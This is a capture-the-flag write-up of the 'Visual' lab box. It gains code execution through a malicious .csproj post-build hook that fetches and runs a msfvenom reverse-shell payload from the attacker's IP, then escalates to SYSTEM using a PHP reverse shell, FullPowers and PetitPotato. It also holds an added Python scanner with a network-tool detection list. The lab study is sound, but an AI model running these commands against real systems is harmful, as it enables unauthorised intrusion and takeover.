Visual

User flag

Initial nmap:

$ nmap -p- 10.10.11.234
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-04 22:45 CDT
Nmap scan report for 10.10.11.234
Host is up (0.10s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 506.14 seconds

There's only the HTTP port open on this box. If we take a look at it, it seems to be a page that will take a link to a git repository and compile the code in the repository. It puts emphasis on the .sln file, so that's likely to be the exploitable part:

Simply provide us with your Git Repo link, and we'll handle the rest. Our cutting-edge technology compiles your projects and sends back the executable or DLL files you need, effortlessly and efficiently. We currently support .NET 6.0 and C# programs, so make sure your Git Repo includes a .sln file for successful compilation. Trust Visual to simplify and streamline your project compilation process like never before.

I first tried using git daemon and inputting the git:// URL into the site, but unfortunately it doesn't support the git protocol.

I next installed cgit following the instructions at https://wiki.archlinux.org/title/Cgit with a few changes:

scan-path=/data/git/
enable-http-clone=1
clone-url "http://$HTTP_HOST$SCRIPT_NAME/$CGIT_REPO_URL"

I could then have the site access and build projects located in /data/git/.

Then I installed Visual Studio Community 2022 on a Windows VM.

I created a new console app and selected .NET 6.0. I created a git repo and added all the files in the project to it, then copied it to the /data/git directory on the machine running cgit.

I uploaded the repo and it built successfully.

I then added a post-build script to the project, and it showed up in the .csproj file with the following contents:

<Target Name="PostBuild" AfterTargets="PostBuildEvent">
  <Exec Command="curl.exe 10.10.14.222:8080/index.html" />
</Target>

I started a Python HTTP server with python3 -m http.server 8080 and uploaded the project with the new changes. I then received a GET request, so that's code execution.

I then created a reverse shell with

msfvenom --payload cmd/windows/reverse_powershell lhost=10.10.14.222 lport=4444 > out.bat

And changed the build script to:

<Target Name="PostBuild" AfterTargets="PostBuildEvent">
  <Exec Command="curl.exe 10.10.14.222:8080/out.bat -o out.bat" />
  <Exec Command="call out.bat" />
</Target>
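The two post-build hooks above work because MSBuild runs any Exec task (and the Pre/PostBuildEvent properties) on the build host. As an added example that is not part of the original post, here is a check a build service like this one could run over a submitted project file before building it; the .csproj text is constructed for the example and the address in it is a placeholder.

```python
import xml.etree.ElementTree as ET

# Constructed sample project file, modelled on the post-build hook shown above.
# The address and payload name are placeholders, not real infrastructure.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PostBuild" AfterTargets="PostBuildEvent">
    <Exec Command="curl.exe 10.0.0.1:8080/out.bat -o out.bat" />
    <Exec Command="call out.bat" />
  </Target>
</Project>"""

# Build-time hooks that run arbitrary commands on the build host. This list is a
# policy choice for the example; MSBuild has other ways to run code (custom tasks,
# imported .targets files), so a build service still needs sandboxing, not only a scan.
RISKY_TASKS = {"Exec"}
RISKY_PROPERTIES = {"PreBuildEvent", "PostBuildEvent"}
NETWORK_TOOLS = ("curl", "wget", "certutil", "bitsadmin", "powershell", "iwr", "invoke-webrequest")

def strip_ns(tag):
    # Older project files carry the msbuild/2003 xmlns; ElementTree prefixes tags with {ns}.
    return tag.split("}", 1)[-1]

def uses_network(cmd):
    """True when the command mentions a tool commonly used to fetch remote content."""
    lowered = cmd.lower()
    return any(tool in lowered for tool in NETWORK_TOOLS)

def find_build_hooks(csproj_xml):
    """Return every build-time command found in a .csproj, with why it was flagged."""
    findings = []
    for elem in ET.fromstring(csproj_xml).iter():
        tag = strip_ns(elem.tag)
        if tag in RISKY_TASKS:
            cmd = elem.get("Command", "")
        elif tag in RISKY_PROPERTIES and (elem.text or "").strip():
            cmd = elem.text.strip()
        else:
            continue
        findings.append({"kind": tag, "command": cmd, "network": uses_network(cmd)})
    return findings

def should_reject(csproj_xml):
    """Policy: refuse to build any project that carries a build-time command hook."""
    return bool(find_build_hooks(csproj_xml))
```

Running should_reject over the sample returns True, with the first finding marked as network-capable and the second (call out.bat) flagged only because it is an Exec task.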

I then caught the reverse shell with

nc -lvnp 4444

And was able to get the user flag from the user's Desktop folder.

Root flag

Looking at C:\Users\enox\Documents\compile.ps1, we can see that the system is using XAMPP, which uses the Apache web server.

Searching for the service:

wmic service get name,displayname,pathname,startmode |findstr /i "Apache"

Then showing details about it:

sc qc ApacheHTTPServer

Looks like it's running as the NT AUTHORITY\Local Service user, and it might be possible to escalate from there. We'll create a PHP payload and drop it in C:\xampp\htdocs\:

msfvenom --payload php/reverse_php lhost=10.10.14.222 lport=4445 > out.php
curl.exe 10.10.14.222:8080/out.php -o out.php

Then open the page in a browser to call the PHP reverse shell.

Once we've opened the PHP shell, we'll want to spawn another reverse shell so that we can preserve state between commands. Close the shell on port 4444 and run:

curl.exe 10.10.14.222:8080/out.bat -o out.bat
out.bat

Then catch the shell on port 4444.

We are now the nt authority\local service user, which usually has impersonation privileges that would allow us to privesc. See this presentation for more information about how this works.

On running whoami /priv, it turns out that we don't have SeImpersonatePrivilege, which is needed for escalation. Luckily, there's a way to get that back. I downloaded FullPowers.exe from the post's linked GitHub, then transferred it to the box:

curl.exe 10.10.14.222:8080/FullPowers.exe -o f.exe
f.exe

We now have all privileges needed to escalate to system.

I first tried using SweetPotato to escalate, but I had no luck with it. After trying several older potatoes I saw referenced, I decided to use Google to find new ones:

site:github.com windows exploit potato after:2022-01-01

One of the results I got from that was PetitPotato, which worked! Here's the command I ran:

curl.exe 10.10.14.222:8080/PetitPotato.exe -o p.exe
p.exe 3 cmd

I then had a shell as nt authority\system and was able to get the root flag!